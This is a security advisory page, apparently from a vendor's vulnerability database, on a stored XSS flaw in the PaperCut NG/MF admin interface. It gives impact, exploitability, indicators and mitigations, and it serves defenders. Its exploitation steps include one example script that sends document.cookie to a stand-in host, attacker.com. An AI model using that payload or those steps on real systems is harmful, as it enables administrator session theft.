CVE-2026-4794
PaperCut NG vulnerability analysis and mitigation

Overview

CVE-2026-4794 describes multiple stored cross-site scripting (XSS) vulnerabilities in PaperCut NG and PaperCut MF print management software affecting all versions before 25.0.10. Authenticated administrator users can inject arbitrary web script or HTML code via various UI fields in the admin interface, potentially compromising other administrators' sessions or enabling unauthorized actions within an authenticated context. The vulnerability was published on March 31, 2026, with a patch released in version 25.0.10. It carries a CVSS v3.1 base score of 4.8 (Medium) and a CVSS v4.0 base score of 2.1 (Low) (GitHub Advisory, PaperCut Bulletin).

Technical details

The root cause is improper neutralization of user-controllable input before it is rendered in web pages served to other users (CWE-79). Multiple UI fields within the PaperCut NG/MF administrator interface fail to sanitize input, allowing a malicious administrator to store crafted JavaScript or HTML payloads that execute in the browser context of other administrators who subsequently view the affected pages. Exploitation requires the attacker to already hold valid administrator credentials and the attack requires passive user interaction from a victim administrator (i.e., the victim must view the page containing the injected payload). No public proof-of-concept exploit code has been identified (GitHub Advisory, PaperCut Bulletin).

Impact

Successful exploitation allows an attacker with administrator-level access to hijack other administrators' authenticated sessions, perform unauthorized administrative actions on their behalf, or exfiltrate session tokens and sensitive configuration data visible within the admin UI. The scope is changed (subsequent system impact), meaning the injected script executes in the browser context of other administrators rather than just the attacker's own session, resulting in low confidentiality and low integrity impacts on the subsequent system. Availability is not directly impacted, and exploitation is constrained to the administrative interface (GitHub Advisory, PaperCut Bulletin).

Exploitability

There is no evidence of public proof-of-concept exploit code or active in-the-wild exploitation as of the time of publication. The EPSS score is approximately 0.044% (4th percentile), indicating a low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation is significantly constrained by the requirement for existing administrator credentials and passive interaction from a victim administrator (GitHub Advisory).

Exploitation steps

  1. Obtain Administrator Access: Gain valid PaperCut NG/MF administrator credentials through phishing, credential stuffing, or insider access — a prerequisite for exploitation.
  2. Identify Injectable UI Fields: Log into the PaperCut admin interface and enumerate UI fields (e.g., printer names, user group descriptions, notification messages, or configuration text fields) that are rendered back to other administrators without proper sanitization.
  3. Inject Malicious Payload: Enter a crafted XSS payload (e.g., <script>document.location='https://attacker.com/steal?c='+document.cookie</script>) into one or more vulnerable UI fields and save the configuration.
  4. Wait for Victim Interaction: Wait for another administrator to navigate to the page containing the injected payload; the script executes automatically in their browser session (passive user interaction).
  5. Harvest Session or Perform Actions: The injected script exfiltrates the victim administrator's session cookie or performs unauthorized administrative actions (e.g., adding rogue admin accounts, modifying printer configurations) using the victim's authenticated context (GitHub Advisory, PaperCut Bulletin).

Indicators of compromise

  • Logs: PaperCut application logs showing unusual administrator account activity, particularly configuration changes to UI fields containing HTML or JavaScript syntax (e.g., <script>, onerror=, javascript:).
  • Network: Outbound HTTP/S requests from administrator browsers to unexpected external domains shortly after accessing the PaperCut admin interface, potentially carrying session cookie data as query parameters.
  • Logs: Web server access logs showing requests to the PaperCut admin interface from multiple administrator accounts in rapid succession or from unusual IP addresses, which may indicate session hijacking.
  • File System: No specific file-system artifacts expected, as this is a browser-side attack; however, review PaperCut's audit log for unexpected changes to printer configurations, user groups, or notification templates containing script tags.

Mitigation and workarounds

PaperCut has released a patch in PaperCut NG/MF version 25.0.10; organizations should upgrade immediately (PaperCut Bulletin). As interim mitigations, restrict administrator account access to the minimum number of trusted users and enforce strong authentication (e.g., MFA) for all admin accounts. Implementing a Content Security Policy (CSP) header on the PaperCut web interface can reduce the impact of any XSS payloads by restricting script execution to trusted sources. Monitor administrator accounts for suspicious activity and review audit logs for unexpected configuration changes.

Additional resources


SourceThis report was generated using AI

Related PaperCut NG vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2023-39470HIGH7.2
  • PaperCut NG logoPaperCut NG
  • cpe:2.3:a:papercut:papercut_ng
NoYesNov 22, 2024
CVE-2024-9672MEDIUM6.3
  • PaperCut NG logoPaperCut NG
  • cpe:2.3:a:papercut:papercut_ng
NoYesDec 10, 2024
CVE-2026-6418MEDIUM4.6
  • PaperCut NG logoPaperCut NG
  • cpe:2.3:a:papercut:papercut_mf
NoYesMay 05, 2026
CVE-2026-6180MEDIUM4.1
  • PaperCut NG logoPaperCut NG
  • cpe:2.3:a:papercut:papercut_mf
NoYesMay 05, 2026
CVE-2026-4794LOW2.1
  • PaperCut NG logoPaperCut NG
  • cpe:2.3:a:papercut:papercut_mf
NoYesMar 31, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management